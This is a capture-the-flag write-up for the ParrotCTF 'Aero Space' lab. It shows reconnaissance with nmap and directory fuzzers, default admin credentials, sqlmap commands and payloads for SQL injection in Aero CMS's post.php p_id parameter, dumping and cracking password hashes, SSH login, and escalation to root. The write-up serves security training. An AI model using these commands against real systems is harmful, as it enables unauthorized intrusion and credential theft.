ParrotCTF: Aero Space Writeup

ParrotCTF: Aero Space Writeup

·

6 min read

creator: parrotassasin15

Difficulty: Medium

Category: SQL Injection

Link: parrot-ctfs.com/hacking/labs/1

Host: 10.14.0.71

Objectives:

  • Obtain user & root flags

  • Complete all questions

Description:

Can you find the vulnerabilities in this CMS? If so, be sure to report them to their GitHub.

Set up

Before engaging anything, connect or download your free VPN pack from the VPN tab.

After downloading your VPN pack, start the VPN using the following command:

sudo open path/to/vpn

most of the time it should be in your Downloads folder, here is the syntax:

sudo openvpn /Downloads/name.ovpn

After that, you can ping the host to ensure it's running.

Enumeration

Let's dive in with a quick nmap scan since we know we are dealing with a CMS and it's vulnerable to SQL Injection according to the machine category and description we should know which specific port the CMS is running on and get an insight into which more ports are open.

nmap 10.14.0.71
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-02 15:24 
Nmap scan report for aero (10.14.0.71)
Host is up (0.23s latency).
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds

Without wasting any time, we need the CMS version running on port 80 and the GitHub repository of the CMS.

We can browse on port 80 using Firefox or your favorite browser and see if there is a CMS version/GitHub link mentioned anywhere.

A common place to look: the footer of the page, source code comments, and maybe response headers. We can also use the Wappalyzer extension to check the technology stack.

After trying all of the above methods, I didn't succeed to get the version but I got the developer name in the default page footer. Guess we will have to settle with a simple Google search after all.

So we have the repo this should lead us to the version and maybe other juicy stuff. After checking the latest commits, we get that the latest version is v0.0.1 there is still another easier way of getting the version that I can't remember correctly.

Now that we have the CMS version, should we fire up Neesus and Metasploit and pwn the mainframe? NO.

How can we use this version number and GitHub repo?:

  1. Search for known vulnerabilities associated with the version(which we already know it's SQLi)

  2. Check if we can find default credentials in the GitHub repo

At this point, we know that Aero CMS v0.0.1 is vulnerable to SQL injection but where does it occur? back to the drawing board, we need to enumerate the webpage to see where the vulnerability occurs.

To achieve this we can start by fuzzing for any endpoints or paths using Gobuster, Feroxbuster, or FFUF. let's use Feroxbuster & FFUF recursively and simultaneously because why not.

Here is the syntax for both:

feroxbuster --url http://10.14.0.71/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x py,html,config,conf,txt,php,dev,backup,bak

ffuf -u "http://10.14.0.71/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc all -fc 404 -ic -e .bak,.db,.config,.txt,.backup,.php,.html,.htm,.tar,.zip,.js -c

This is what we will get after running either of the above commands:

──────────────────────────────────────────────────
301        9l       28w      309c http://10.14.0.71/images
200      181l      371w     6171c http://10.14.0.71/search.php
200      233l      484w        0c http://10.14.0.71/index.php
302      179l      371w     6137c http://10.14.0.71/category.php
301        9l       28w      308c http://10.14.0.71/admin
301        9l       28w      315c http://10.14.0.71/admin/images
302      293l      627w        0c http://10.14.0.71/admin/index.php
200      138l      308w     4778c http://10.14.0.71/registration.php
302      192l      464w     7470c http://10.14.0.71/admin/comments.php
302      194l      458w     7933c http://10.14.0.71/admin/users.php
301        9l       28w      311c http://10.14.0.71/includes
200        1l        0w        1c http://10.14.0.71/includes/login.php
301        9l       28w      312c http://10.14.0.71/admin/css
200       31l       88w      988c http://10.14.0.71/includes/header.php
301        9l       28w      317c http://10.14.0.71/admin/includes
302       44l       94w     1275c http://10.14.0.71/admin/includes/header.php
301        9l       28w      313c http://10.14.0.71/javascript
301        9l       28w      308c http://10.14.0.71/fonts

Sweet, looking at that output we can see that there is an admin panel, search panel, and other good stuff like PhpMyadmin .

Remember that we can get the default username and password on the GitHub repo or on our target's homepage which is Username: admin and Password: password

With those credentials, we can edit posts on the blog, add users, and give them permission but that's not our goal, we need to know where the SQLi occurs.

Okay so, this is what we have so far on the blog paths:

/search.php
/login.php
/post.php
/admin.php
/category.php
-------snip--------

Well, this is where we channel our inner 1337_h4x0r moment.

Exploitation

We can fire up the old reliable sqlmap or decide to do the injection manually on the following endpoints:

category.php?category=1
post.php?p_id=1

If you browse all the paths properly, it is like a buffet of taking user input.

As a hater and an elite hacker man, we are going to target http://10.14.0.71/post.php?p_id=1 . there are other parts we can test for SQL injection like the search bar using Burp suite but let's stick with /post.php?p_id=1

Let's craft the sqlmap syntax to trigger the vulnerability.

sqlmap -u http://10.14.0.71/post.php?p_id=1 --dbms mysql --level 3 --risk 3

We are using the --dbms tag because we already know the Database runs on MySQL because of the info we got from the Wappalyzer extension.

After running the above command we get the following output from sqlmap :

---
Parameter: p_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p_id=1 AND 5165=5165

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p_id=1 AND (SELECT 9525 FROM (SELECT(SLEEP(5)))Yhmj)
---

We are golden!!, p_id parameter it is. Now it's time to get the credz

Time to dump some more info and see what we will work with. Take this syntax and slap it right on the terminal:

sqlmap -u http://10.14.0.71/post.php?p_id=1 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

It would be quicker if we dump info one by one from the Database name to all Columns

database management system users [7]:
[*] 'debian-sys-maint'@'localhost'
[*] 'mysql.infoschema'@'localhost'
[*] 'mysql.session'@'localhost'
[*] 'mysql.sys'@'localhost'
[*] 'neil'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'localhost'

Oooow, look at that Neil guy He looks famous I wonder what He did back then We won't mind getting His password hash

sqlmap -u http://10.14.0.71/post.php?p_id=1 -p p_id -D aerocms -T users -C user_id,username,password --dump --threads=6

From here we can use John the Ripper or Hashcat to crack the above hashes using the rockyou.txt wordlist.

john neil.hash --wordlist=/home/xi/rockyou.txt

Then: john neil.hash --show

Or Hashcat: hashcat -m 3200 neil.hash rockyou.txt where

After retrieving the password for the user neil we can use it to log in to the blog but let's see if the password can work on SSH running on port 22.

ssh neil@10.14.0.71

In our case we get SSH access using the cracked password, now we can get and submit the user.txt

neil@space:~$ cat user.txt
76*************************************fff
neil@space:~$

root.txt

First, we run the command sudo -l to check what our user neil can run on the machine

neil@space:~$ sudo -l
Matching Defaults entries for neil on space:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User neil may run the following commands on space:
    (ALL : ALL) ALL
neil@space:~$

This should be easy as sudo su

neil@space:~$ sudo su
root@space:/home/neil# cd ~
root@space:~# cat root.txt 
2024****************************5602
root@space:~#

GGs